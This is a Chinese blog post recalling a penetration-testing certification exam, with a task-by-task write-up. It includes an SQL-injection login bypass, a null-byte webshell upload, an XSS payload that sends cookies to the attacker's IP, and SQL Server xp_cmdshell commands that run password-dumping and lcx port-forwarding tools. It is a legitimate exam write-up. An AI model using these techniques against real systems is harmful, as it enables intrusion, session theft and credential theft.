• 欢迎访问小澍的博客,编程记录,技术贴以及折腾的日常,推荐使用最新版火狐浏览器和Chrome浏览器访问本网站
  • 如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏我的博客吧

CISP-PTE考试回忆

Coding root 1年前 (2019-08-12) 5905次浏览 已收录 0个评论

考试

pte的集训大部分时间在进行主机渗透实操,由于技术比较菜,每天几乎都被虐的自闭,不过最后换来了轻松通过了考试,考试满分100,70分为通过标准,其中20分选择,80分实操(8个key),最终我惊险的拿到了10分选择(再错一个就相当于选择题没做),7个key,还是比较满意的,下面是这次的WriteUp。

CISP-PTE 2019(8月)

81. SQL 注入:

输入用户名密码登录类型的注入,尝试万能密码admin’ OorR ‘1’=’1 ,绕过,搭配不同闭合直接绕过登录,登录后拿key1

82. 文件上传

要求上传图片,选择现成的1.jpg(php图片马),上传,BP抓包后尝试%00截断,文件filename修改为:1.phtml%00.jpg,%00 进行url-decode,放行数据上传成功,网站查看上传路径,菜刀连接后拿key2

83. 文件包含

观察网站url是文件包含url,类型为http:xxxx/start/xxx_file?=xxx.html,修改url去掉文件包含,直接访问http:xxxx/start/xxx.html,可访问,查看源代码发现里面已经有写好的一句话木马,菜刀直接连题目url,拿key3

84.XSS

题目提示执行XSS拿cookie,网站有留言功能本机打开nc执行监听,执行命令:

nc -nlvp 1234

表示监听本机1234端口,将监听网站连接信息直接输出在cmd中,成功执行后,新建cmd ipconfig查看本机Ip,回到题目留言板,检查元素发现输入框标签为textarea,构造下面的js:

</textarea>
<script>
var img = document.createElement("img");
img.src="https://获取的ip:1234/a?"+escape(document.cookie);
</script>

提交后,cmd中出现phpseesid%3Dxxxxxxxxxxxx,
回到题目,点击登录,抓包,发现数据包中包含cookie:phpsessid:xxxxxxxxxx,替换cmd中实时更新的sesid,重放后查看BP中原网页拿key4

85 爆破

题目带有验证码,但是用户名admin密码随意输入,验证码输入当时正确的抓包直接放到bp intruder模块中加载提供的字典就直接爆破,最终获得密码,登录,拿key5(当时看题目说明,举例子里说一个4位的数字密码有一万种可能,我以为已经限定了密码种类,结果没有爆破出来。。理解能力真是底下。。。)

主机渗透:

nmap扫描ip 获得1433,8080,80三个端口
发现8080为后台登录,纯爆破,失败;
御剑分别扫描原网站与8080端口,发现在8080端口下的www.zip,获得后台sql server 用户名sa 及密码sa_pte,使用navicat连接 ,ip不加端口,连接后查看表,look me 中有key7
查找数据库,获得天子用户名,密码,密码md5解密 得到key6;(8080网站本身有一句话:使用有问题联系 天子,可以将这个作为用户名直接爆破拿key6)
利用sa权限,开启xmd_shell

exec sp_configure 'show advanced options',1
reconfigure
exec sp_configure 'xp_cmdshell',1
reconfigure

在原后台中上传小马,上传失败则直接上传图片,BP抓包改包,上传文件名改:1.aspx .jpg 重放后BP原网页显示了上传路径;
回Navicat,

exec xp_cmdshell 'dir d:' //查看d盘下网站路径
exec xp_cmdshell 'copy bp中的图片路径  d:/oa/1.aspx'

菜刀连1.aspx,连接后上传提权工具中的win-2003-3389.vbs,GetPass.exe,转发工具的lcx.exe至网站根目录

exec xp_cmdshell 'd:\oa\win02993-3389.vbs'
exec xp_cmdshell 'netstat -an'

观察输出已经有0.0.0.0:3389,表示此事已经开启了远程桌面3389
继续:

exec xmd_shell 'd:\web\lcx.exe -slave 攻击机ip 2222 127.0.0.1 3389'

本地cmd执行lcx -listen 2222 3333
回nativecat

exec xp_cmdshell 'd:\oa\GetPass.exe'

拿密码后,
cmd mstsc打开远程连接
连接名127.0.0.1:3333 ,填写admin的密码,工作域,登录
连接拿key8


XiaoShuBlog , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:CISP-PTE考试回忆
喜欢 (10)
[gaosirgoo@foxmail.com]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址